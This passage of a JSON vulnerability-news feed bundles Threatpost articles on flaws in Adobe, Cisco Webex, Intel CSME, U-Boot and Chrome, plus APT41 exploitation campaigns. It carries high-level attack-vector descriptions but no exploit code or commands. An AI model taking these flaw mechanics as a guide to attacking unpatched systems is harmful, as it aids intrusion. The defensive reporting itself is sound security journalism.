fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-29T16:48:17", "type": "threatpost", "title": "Unpatched Wi-Fi Extender Opens Home Networks to Remote Control", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16213", "CVE-2019-19505", "CVE-2019-19506", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-06-29T16:48:17", "id": "THREATPOST:7FC78356FBFC440CD45BB996E2A8A5C8", "href": "https://threatpost.com/unpatched-wi-fi-extender-remote-control/156990/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:19:42", "description": "Adobe has issued an out-of-band patch for a critical flaw in Adobe Character Animator, its application for creating live motion-capture animation videos. The flaw can be exploited by a remote attacker to execute code on affected systems.\n\nThe flaw ([CVE-2020-9586](<https://helpx.adobe.com/security/products/character_animator/apsb20-25.html>)) is found in versions 3.2 and earlier and exists within the parsing of the BoundingBox element in PostScript. Specifically, it stems from a stack-based buffer overflow error, meaning the element lacks proper validation of the length of user-supplied data prior to copying it to a stack-based buffer.\n\n\u201cOf the bugs fixed today, CVE-2020-9586 stands out as it could code execution if a user opens a malicious file or visits a malicious web page,\u201d Dustin Childs, manager at Trend Micro\u2019s Zero Day Initiative, told Threatpost. \u201cAn attacker can leverage this vulnerability to execute code in the context of the current process.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nUsers are urged to update to version 3.3 for Windows and macOS. While the flaw is critical, the security bulletin is a Priority 3 update, which according to Adobe resolves vulnerabilities in a product that has historically not been a target for attackers. \u201cAdobe recommends administrators install the update at their discretion,\u201d according to the update.\n\nAdobe on Tuesday also issued several updates addressing other flaws. While these other vulnerabilities are \u201cimportant\u201d in severity, they would all need to be combined with additional bugs to gain code execution, Childs told Threatpost.\n\nOne such flaw exists in [Adobe Premiere Rush](<https://helpx.adobe.com/security/products/premiere_rush/apsb20-29.html>), its video editing software for online video creators. The software has an out-of-bounds read vulnerability (CVE-2020-9617) that could lead to information disclosure. Users are urged to update to Adobe Premiere Rush version 1.5.12 for Windows and macOS.\n\nAnother \u201cimportant\u201d-severity flaw exists in [Adobe Premiere Pro](<https://helpx.adobe.com/security/products/premiere_pro/apsb20-27.html>), another version of Adobe\u2019s video editing software that is more advanced than Adobe Premiere Rush (which is instead more targeted toward YouTubers and social media creators). Like Premiere Rush, Premiere Pro has an out-of-bounds read flaw (CVE-2020-9616) that could lead to information disclosure. Users can update to version 14.2 for Windows and macOS.\n\nFinally, Adobe stomped out a flaw in [Audition](<https://helpx.adobe.com/security/products/audition/apsb20-28.html>), which is its toolset offering for creating and editing audio content. The out-of-bounds read flaw (CVE-2020-9618) can enable information disclosure if exploited. A patch is available in Audition 13.0.6 for Windows and macOS.\n\nFor all of these flaws, \u201cAdobe is not aware of any exploits in the wild for any of the issues addressed in these updates,\u201d according to the alert. Mat Powell with ZDI was credited with discovering these flaws.\n\nThe unscheduled patches come a week after [Adobe\u2019s regularly-scheduled updates](<https://threatpost.com/adobe-kills-16-critical-flaws-in-acrobat-and-reader-digital-negative-sdk/155652/>), which fixed 16 critical flaws across its Acrobat and Reader applications and its Adobe Digital Negative (DNG) Software Development Kit \u2013 and addressed 36 CVEs overall.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On [June 3 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>), join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, [Taming the Unmanaged and IoT Device Tsunami](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>). Get exclusive insights on how to manage this new and growing attack surface. [Please register here](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>) for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-05-19T15:44:46", "type": "threatpost", "title": "Adobe Patches Critical RCE Flaw in Character Animator App", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-9586", "CVE-2020-9616", "CVE-2020-9617", "CVE-2020-9618"], "modified": "2020-05-19T15:44:46", "id": "THREATPOST:20ECC314C8122C21B6B0C611C14F1A13", "href": "https://threatpost.com/adobe-patches-critical-rce-flaw-character-animator/155882/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:25:39", "description": "UPDATE\n\nCisco Systems has fixed a high-severity vulnerability in its popular Webex video conferencing platform, which could let strangers barge in on password-protected meetings \u2013 no authentication necessary.\n\nA remote attacker would not need to be authenticated to exploit the flaw, according to Cisco. All an attacker would need is the meeting ID and a Webex mobile application for either iOS or Android.\n\n\u201cAn unauthorized attendee could exploit this vulnerability by accessing a known meeting ID or meeting URL from the mobile device\u2019s web browser. The browser will then request to launch the device\u2019s Webex mobile application,\u201d wrote Cisco in a [Friday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200124-webex-unauthjoin>). Next, the interloper can access the specific meeting via the mobile Webex app, no password required.\n\n\u201cThe vulnerability is due to unintended meeting information exposure in a specific meeting join flow for mobile applications,\u201d Cisco said. \u201cAn unauthorized attendee could exploit this vulnerability by accessing a known meeting ID or meeting URL from the mobile device\u2019s web browser.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOne caveat to the attack is that unauthorized attendees would be visible in the attendee list of the meeting as a mobile attendee \u2013 meaning their presence could be detected by others in the meeting. However, if left undetected, an attacker would be able to eavesdrop on potentially secretive or critical business meeting details.\n\nAffected are Cisco Webex Meetings Suite sites and Cisco Webex Meetings Online sites for versions earlier than 39.11.5 (for the former) and 40.1.3 (for the latter). Cisco fixed this vulnerability in versions 39.11.5 and later and 40.1.3 and later for Cisco Webex Meetings Suite sites and Cisco Webex Meetings Online sites.\n\nNo user interaction is required for updating, according to Cisco. However, users can check that their Cisco Webex platform is up to date by:\n\n * Logging in to the Cisco Webex Meetings Suite site or Cisco Webex Meetings Online site and navigating to Downloads on the left side of the page.\n * Next to Version Information, hover over the circled i.\n * Check the value displayed next to Page version.\n\nThe flaw (CVE-2020-3142), which has a CVSS score of 7.5 out of 10, was found internally during the resolution of a Cisco TAC support case.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements of the vulnerability that is described in this advisory,\u201d according to Cisco.\n\nHigh-severity and critical flaws continue to crop up for [Cisco\u2019s Webex platform](<https://threatpost.com/cisco-webex-remote-code-execution/144805/>) \u2013 including one patched just a few weeks ago that [could enable a remote attacker](<https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/>) to execute commands \u2013 as well as video conferencing applications in general. In 2018, for instance, a serious vulnerability in [Zoom\u2019s desktop conferencing application](<https://threatpost.com/critical-zoom-flaw-lets-hackers-hijack-conference-meetings/139489/>) was discovered that could allow a remote attacker to hijack screen controls and kick attendees out of meetings.\n\nThis is also only the latest security update issued this week by Cisco \u2013 the telecom giant on Wednesday [released updates addressing 27 flaws](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=50#~Vulnerabilities>), including a critical flaw in its [administrative management tool](<https://threatpost.com/cisco-critical-network-security-tool-flaw/152131/>) for Cisco network security solutions. Earlier this month, Cisco [fixed two high-severity vulnerabilities](<https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/>) in its products, including one in its popular Webex video conferencing platform, that could enable a remote attacker to execute commands. Also earlier in January [Cisco also patched three critical vulnerabilities](<https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/>) (CVE-2019-15975, CVE-2019-15976, CVE-2019-15977) in its Data Center Network Manager (DCNM), for which a [proof-of-concept exploit](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) was later published.\n\n_(This article was updated 1/25/20 at 2:45 pm ET to more accurately reflect the specific attack vector.)_\n", "cvss3": {}, "published": "2020-01-24T19:27:45", "type": "threatpost", "title": "Cisco Webex Flaw Lets Unauthenticated Users Join Private Online Meetings", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-15975", "CVE-2019-15976", "CVE-2019-15977", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3142"], "modified": "2020-01-24T19:27:45", "id": "THREATPOST:525BDFF0E0C4D33D5E543DA8234EA30B", "href": "https://threatpost.com/cisco-webex-flaw-lets-unauthenticated-users-join-private-online-meetings/152191/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:24:39", "description": "Intel is warning of a high-severity flaw in the firmware of its converged security and management engine (CSME), which if exploited could allow privilege escalation, denial of service and information disclosure.\n\nCSME powers Intel\u2019s Active Management System hardware and firmware technology, used for remote out-of-band management in consumer or corporate PCs, Internet of Things (IoT) devices, and workstations.\n\nThe subsystem of CSME has an improper authentication bug ([CVE-2019-14598](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14598>)), which has a CVSS score of 8.2 out of 10.0, making it high severity. A privileged user, with local access, could exploit the flaw to launch an array of attacks, according to Intel.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cIntel recommends updating to Intel CSME versions 12.0.49, 13.0.21, and 14.0.11 or later provided by the system manufacturer that addresses these issues,\u201d [according to Intel\u2019s advisory](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00307.html>). \u201cIntel recommends IOT customers using Intel CSME version 12.0.55 to update to 12.0.56 or later provided by the system manufacturer that addresses these issues.\u201d\n\nIt\u2019s not the first serious flaw found in CSME. In November, a [critical flaw in CSME](<https://threatpost.com/intel-critical-info-disclosure-bug-security-engine/150124/>) was patched that could allow escalation of privilege, denial of service or information disclosure. Another critical flaw [discovered in May](<https://threatpost.com/intel-fixes-critical-high-severity-flaws-across-several-products/144940/>) could allow an authenticated user to enable escalation of privilege over network access in CSME.\n\n## Other Flaws\n\nOverall, Intel patched six flaws on Tuesday, including the high-severity flaw in CSME. The remainder of the vulnerabilities were medium and low-severity.\n\nA medium-severity flaw was found in Intel Renesas Electronics USB 3 driver, the driver for the USB 3 Renesas Electronics adapter that comes in many common Intel motherboards. The flaw allows privilege escalation ([CVE-2020-0560](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0560>)) and stems from improper permissions in the installer. Intel said that rather than releasing updates, it has issued a product discontinuation notice for the driver. All versions of the driver are affected.\n\n\u201cIntel has issued a Product Discontinuation notice for Intel Renesas Electronics USB 3.0 Driver and recommends that users of the Intel Renesas Electronics USB 3.0 Driver uninstall it or discontinue use at their earliest convenience,\u201d [Intel said](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00273.html>).\n\nTwo medium-severity flaws exist in versions of the Intel RAID Web Console, which allows users to configure the Intel RAID custom storage controllers and disk drives installed on a system. One medium-severity [privilege escalation flaw](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00341.html>) exists in Intel RAID Web Console 3 for Windows ([CVE-2020-0564](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0564>)), which stems from improper permissions in the installer. The other exists in [Intel RAID Web Console 2,](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00339.html>) also stemming from improper permissions in the installer ([CVE-2020-0562](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0562>)). Intel also patched [a medium-severity flaw](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00340.html>) in Intel Manycore Platform Software Stack, a series of Intel software components necessary to run the Intel Xeon Phi Coprocessor. The flaw ([CVE-2020-0563](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0563>)) that allows privilege escalation and stems from improper permissions in the installer.\n\nFinally, a low-severity flaw was [discovered and patched](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00336.html>) in the Intel Software Guard Extension (SGX) SDK, which if exploited could enable privilege escalation.\n\nIt\u2019s only the latest Intel security updates. In January, Intel [warned of a high-severity](<https://threatpost.com/intel-fixes-high-severity-flaw-in-performance-analysis-tool/151837/>) vulnerability in its performance analysis tool called Intel VTune Profiler. If exploited the flaw allows an adversary to perform a privilege escalation attack, giving them elevated and unauthorized system access to a targeted system. Also in January, [Intel disclosed](<https://threatpost.com/new-cacheout-attack-targets-intel-cpus/152323/>) a new speculative execution type attack, dubbed CacheOut, that could allow attackers to trigger data leaks from most Intel CPUs.\n\n_**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us [Wednesday, Feb. 19 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>) when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**_\n\n**Share this article:**\n\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "cvss3": {}, "published": "2020-02-11T19:46:29", "type": "threatpost", "title": "Intel Patches High-Severity Flaw in Security Engine", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-14598", "CVE-2020-0560", "CVE-2020-0562", "CVE-2020-0563", "CVE-2020-0564", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-02-11T19:46:29", "id": "THREATPOST:D7E85EFA2708BCF8E9777438F3726A49", "href": "https://threatpost.com/intel-patches-high-severity-flaw-in-security-engine/152794/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:21:28", "description": "Adobe released security patches for vulnerabilities in its ColdFusion, After Effects and Digital Editions applications. If exploited, the flaws could enable attackers to view sensitive data, gain escalated privileges, and launch denial-of-service attacks. Each of the bugs were rated important-severity, based on CVSS rankings, marking an extremely low-volume month for Adobe bug fixes.\n\nOverall Adobe patched flaws tied to five CVEs as [part of its regularly scheduled](<https://blogs.adobe.com/psirt/?p=1859>) security updates, Tuesday. That number pales in comparison to [March, where Adobe patched flaws](<https://threatpost.com/critical-adobe-photoshop-acrobat-reader-flaws/153902/>) in an out-of-band update tied to 41 CVEs across its products, 29 of which were critical in severity. In February Adobe patched flaws tied to 42 CVEs in its [regularly scheduled updates](<https://blogs.adobe.com/psirt/?p=1830>), 35 of which were critical in severity.\n\n\u201cAfter several months of heavy and highly critical patches, Adobe is giving us a break of sorts,\u201d said Jay Goodman, strategic product marketing manager, Automox, in a statement. \u201cAlthough the CVEs are only marked as important, it is still a good cyber hygiene practice to get your applications patched to reduce your risk exposure.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThree of the vulnerabilities disclosed this week [were discovered in ColdFusion,](<https://helpx.adobe.com/security/products/coldfusion/apsb20-18.html>) Adobe\u2019s commercial rapid web-application development platform. These flaws included an insufficient input validation flaw ([CVE-2020-3767](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-3767>)) that could enable application-level denial of service (DoS), a DLL search-order hijacking glitch ([CVE-2020-3768](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-3768>)) that could enable privilege escalation, and an improper access control ([CVE-2020-3796](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-3796>)) which could lead to system file structure disclosure.\n\nAffected are Update 14 and earlier of ColdFusion 2016 (users are encouraged to update to Update 15) and Update 8 and earlier of ColdFusion 2018 (fixed in Update 9). These flaws have a Priority 2 update rating, meaning that the flaws were found in a product \u201cthat has historically been at elevated risk\u201d \u2013 but \u201cthere are currently no known exploits,\u201d according to Adobe.\n\nJason Troy (CVE-2020-3767), Nuttakorn Tungpoonsup and Ammarit Thongthua from Secure D Center\u2019s research team and security researcher Sittikorn Sangrattanapitak (CVE-2020-3768) and Raki Ben Hamouda (CVE-2020-3796) were credited with discovering the flaws.\n\nAdobe also patched an [information disclosure flaw](<https://helpx.adobe.com/security/products/after_effects/apsb20-21.html>) in Adobe After Effects, its digital visual effects, motion graphics, and compositing application, for Windows. The vulnerability (CVE-2020-3809) stems from an Out-of-Bounds read glitch. Matt Powell of Zero Day Initiative (ZDI) was credited with discovering the flaw.\n\nDustin Childs, manager with the ZDI program, told Threatpost that this flaw allows remote attackers to disclose sensitive information on affected installations of Adobe After Effects. User interaction is required to exploit this vulnerability, in that the target must visit a malicious page or open a malicious file, he said.\n\n\u201cThe specific flaw exists within the parsing of TIF files,\u201d Childs told Threatpost. \u201cCrafted data in a TIF file can trigger a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process.\u201d\n\nAffected are After Effects versions 17.0.1 and earlier; a fix is available in versions 17.0.6 for Windows and macOS.\n\nAnother flaw, [disclosed in Adobe Digital Editions](<https://helpx.adobe.com/security/products/Digital-Editions/apsb20-23.html>), its ebook reader software program, could enable information disclosure. This vulnerability (CVE-2020-3798) stems from file enumeration (host or local network). Affected are versions of Digital Editions 4.5.11.187212 and below for Windows; users are encouraged to update to version 4.5.11.187303. Gertjan Franken and Tom Van Goethem from imec-DistriNet, KU Leuv were credited with discovering the flaws.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-14T18:23:05", "type": "threatpost", "title": "Adobe Fixes 'Important' Flaws in ColdFusion, After Effects and Digital Editions", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3767", "CVE-2020-3768", "CVE-2020-3796", "CVE-2020-3798", "CVE-2020-3809"], "modified": "2020-04-14T18:23:05", "id": "THREATPOST:54F790259E54FB2B08B5ABB20B033701", "href": "https://threatpost.com/adobe-fixes-important-flaws-in-coldfusion-after-effects-and-digital-editions/154780/", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:29:26", "description": "Multiple vulnerabilities have been found in [Das U-Boot](<https://www.denx.de/wiki/U-Boot>), a universal bootloader commonly used in embedded devices like Amazon Kindles, ARM Chromebooks and networking hardware. The bugs could allow attackers to gain full control of an impacted device\u2019s CPU and modify anything they choose.\n\nResearchers at ForAllSecure found the flaws in U-Boot\u2019s file system drivers. They include a recursive stack overflow in the DOS partition parser, a pair of buffer-overflows in ext4 and a double-free memory corruption flaw in ext4. They open the door to denial-of-service attacks, device takeover and code-execution.\n\nThere are both local and remote paths to exploitation for these flaws. If a vulnerable device is configured to boot from external media, such as an SD card or USB drive, attackers with physical access could subvert the normal boot process of the device and control the loading of the operating system, giving them substantial control over the device.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIf the device is configured to network boot, remote attackers could use an initial method to compromise the corporate or Wi-Fi network that a target device is attached to (including social-engineering malware onto a victim\u2019s endpoint or exploiting known vulnerabilities), and from there attacking the U-Boot device from that local network location.\n\n\u201cThe most obvious route for exploitation requires physical access, and could either cause denial of service (possible device bricking) or could subvert the boot process for a device or possibly bypass trusted boot,\u201d Maxwell Koo, ForAllSecure analysis engineer, told Threatpost in an interview. \u201cIf device is configured to allow pxe boot and is configured with CONFIG_CMD_FS_GENERIC, there is a possible network avenue of exploitation via CVE-2019-13104 through -13106, with the same impact.\u201d\n\nHe added, \u201cI\u2019d say it would take moderate-to-high expertise to develop an initial exploit for a given device.\u201d\n\n## Technical Details\n\nCVE-2019-13103 is a stack overflow that affects all versions of U-Boot in the archives, which occurs when reading a DOS partition table, which refers to itself. This causes the \u201cpart_get_info_extended\u201d function to call itself repeatedly with the same arguments, causing unbounded stack growth.\n\n\u201cOn QEMU\u2019s vexpress-a15 board, the CPU returns to 0 but continues executing NOPs until it hits data and executes it,\u201d according to the [GitHub write-up](<https://gist.github.com/deephooloovoo/d91b81a1674b4750e662dfae93804d75>) from the ForAllSecure interns who discovered the flaws, Paul Emge and Zion Basque.\n\nIn a technical analysis shared with Threatpost, the researchers explained that in testing, an emulated [ARM CPU](<https://threatpost.com/google-arm-android-bugs-memory-tagging/146950/>) \u201cis happy to execute a bunch of NOPs from this memory location, until, after many megabytes, it reaches some data and returns to 0 again.\u201d This would lead to DoS, but depending on the exact system and software installed, something worse could happen.\n\n\u201cFor example, other data in this part of the address space could get executed and lead to other anomalous behaviors, including the ability to run attacker provided code,\u201d they wrote.\n\nAs for the buffer-overflow flaws, CVE-2019-13104 affects U-Boot versions 2016.11-rc1 through 2019.07-rc4. At ext4fs.c:74 it is possible for len to underflow while listing files in a crafted filesystem.\n\n\u201cIf this happens, eventually there is a memcpy with a negative (so effectively infinite) length,\u201d the research pair wrote. \u201cThis causes all of memory to be overwritten until [in sandbox testing], it segfaults\u2026There\u2019s definitely memory corruption.\u201d\n\nThe second, more serious buffer-overflow issue is CVE-2019-13106, affecting U-Boot versions 2016.09 through 2019.07-rc4.. The ext4 code can overwrite portions of the stack with 0s in the ext4fs_read_file function, while listing files in an untrusted filesystem. Researchers said that the bug could \u201ceasily give complete control of the CPU,\u201d which would defeat verified boot.\n\n\u201cThe bug occurs when a filename (or potentially some other structure) is located across a block boundary,\u201d explained the researchers in the GitHub post. \u201cThe number of 0s written to the stack is controllable by changing the position of the filename.\u201d\n\nAnd in CVE-2019-13105, which affects U-Boot versions 2019.07-rc1 through 2019.07-rc4, if there is an invalid/out-of bounds block number, ext_cache_read doesn\u2019t set the freed cache-&gt;buf to 0, which results in a double-free issue in ext_cache_ini. A double-free vulnerability occurs when, as the name says, a variable is free()\u2019d twice. The variable is still usable, but the memory pointed to that variable can be free.\n\nForAllSecure also found five low-severity divide-by-zero bugs, triggered by invalid extended file systems.\n\nU-Boot patched the bugs as of its v. 2019.10 release \u2013 but devices are likely still vulnerable given that the update process is controlled by the vendor of the device rather than U-Boot itself.\n\n\u201cAs a bootloader, which is often used in embedded devices with a long/non-existent update cycle, the unpatched code is likely present and will remain present on many devices for some time,\u201d Koo told Threatpost. \u201cSeverity depends somewhat on configuration of the device in question (U-Boot is pretty configurable and this will differ a lot between devices).\u201d\n\nAmazon did not immediately respond to a request for comment.\n\nIf support for DOS partitions or ext4 filesystem images is not present in the U-Boot configuration of a device, then the bugs have impact.\n\n**_What are the top risks to modern enterprises in the peak era of data breaches? Find out: Join breach expert Chip Witt from SpyCloud and Threatpost senior editor Tara Seals, in our upcoming free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_, \u201cTrends in Fortune 1000 Breach Exposure.\u201d _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-11-07T17:31:06", "type": "threatpost", "title": "Amazon Kindle, Embedded Devices Open to Code-Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13103", "CVE-2019-13104", "CVE-2019-13105", "CVE-2019-13106", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2019-11-07T17:31:06", "id": "THREATPOST:D0762E9D61E59AD261E8F24340AE261C", "href": "https://threatpost.com/amazon-kindle-embedded-devices-code-execution/150003/", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2020-10-16T22:09:20", "description": "Google has stomped out several serious code-execution flaws in its Chrome browser. To exploit the flaw, an attacker would merely need to convince a target to visit a specially crafted webpage via phishing or other social-engineering lures.\n\nOverall, Google\u2019s release of Chrome 85.0.4183.121 for Windows, Mac and Linux \u2013 which will roll out over the coming days \u2013 fixed 10 vulnerabilities. The successful exploitation of the most severe of these could allow an attacker to execute arbitrary code in the context of the browser, according to Google. Google Chrome versions prior to 85.0.4183.121 are affected.\n\n\u201cDepending on the privileges associated with the application, an attacker could view, change or delete data,\u201d [according to Google\u2019s Tuesday security advisory](<https://chromereleases.googleblog.com/2020/09/stable-channel-update-for-desktop_21.html>). \u201cIf this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nGoogle disclosed five high-severity flaws in its Tuesday advisory, although technical details remain scant as this information is usually \u201ckept restricted until a majority of users are updated with a fix,\u201d according to its advisory.\n\nHowever, Google did say that \u201cthese vulnerabilities can be exploited if a user visits, or is redirected to, a specially crafted web page.\u201d\n\nThe high-severity flaws include an out-of-bounds read error in storage in Google Chrome ([CVE-2020-15960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15960>)). This heap buffer-overflow flaw could allow a remote attacker to potentially perform out of bounds memory access via a crafted HTML page.\n\nAlso fixed were three flaws relating to insufficient policy enforcement. These include two bugs stemming from extensions in Google Chrome ([CVE-2020-15961](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15961>), [CVE-2020-15963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15963>)), which could allow an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension.\n\nThe third sufficient policy-validation ([CVE-2020-15962](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15962>)) issue exists in Chrome\u2019s serial function, and could allow a remote attacker to potentially perform out-of-bounds memory access via a crafted HTML page.\n\nFinally, Google fixed an out-of-bounds write flaw ([CVE-2020-15965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15965>)) in V8, an open-source JavaScript engine developed by The Chromium Project for Google Chrome and Chromium web browsers. The flaw could allow a remote attacker to potentially perform out-of-bounds memory access via a crafted HTML page.\n\nGoogle said that there are currently no reports of these vulnerabilities being exploited in the wild. The company urged Chrome users to apply the stable channel update to vulnerable systems immediately, and reminded users \u201cnot to visit un-trusted websites or follow links provided by unknown or un-trusted sources.\u201d\n\nLast month, Google fixed various severe vulnerabilities in its web browsers, including a bug in [Google\u2019s Chromium-based browsers](<https://threatpost.com/google-chrome-bug-data-theft/158217/>) that could allow attackers to bypass the Content Security Policy (CSP) on websites, in order to steal data and execute rogue code. Google also fixed a [high-severity Chrome vulnerability](<https://threatpost.com/google-fixes-high-severity-chrome-browser-code-execution-bug/158600/>) that could be used to execute arbitrary code, in August.\n", "cvss3": {}, "published": "2020-09-22T18:44:57", "type": "threatpost", "title": "Google Chrome Bugs Open Browsers to Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-15960", "CVE-2020-15961", "CVE-2020-15962", "CVE-2020-15963", "CVE-2020-15965", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-09-22T18:44:57", "id": "THREATPOST:EC00DBD1B5F3C10C2DB3271A9666C8FE", "href": "https://threatpost.com/google-chrome-attack/159466/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:22:15", "description": "Researchers warn that APT41, a notorious China-linked threat group, has targeted more than 75 organizations worldwide in \u201cone of the broadest campaigns by a Chinese cyber-espionage actor observed in recent years.\u201d\n\nBetween Jan. 20 and March 11, researchers observed APT41 exploiting vulnerabilities in Citrix NetScaler/ADC, Cisco routers and Zoho ManageEngine Desktop Central as part of the widespread espionage campaign. Researchers said it\u2019s unclear if APT41 attempted exploitation en masse, or if they honed in on specific organizations \u2014 but the victims do appear to be more targeted in nature.\n\n\u201cWhile APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41,\u201d wrote Christopher Glyer, Dan Perez, Sarah Jones and Steve Miller with FireEye, in a [Wednesday analysis](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nDozens of companies were targeted from varying industries, including banking and finance, defense industrial bases, government, healthcare, legal, manufacturing, media, non-profit, oil and gas, transportation and utilities. APT41 also targeted firms from a broad array of countries, including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, the U.K. and the U.S.\n\n**Cisco, Citrix and Zoho Exploits**\n\nStarting on Jan. 20, researchers observed the threat group attempting to exploit the notorious flaw ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)) in Citrix Application Delivery Controller (ADC) and Citrix Gateway devices revealed as a zero-day then patched earlier this year. It was [disclosed on Dec. 17](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) \u2013 and [proof of concept (PoC) code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) was released shortly after \u2013 before a patch [was issued in January](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\nIn this campaign, researchers observed three waves of exploits against [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>) \u2013 the first on Jan. 20 \u2013 21, the second on Feb. 1, and finally a \u201csignificant 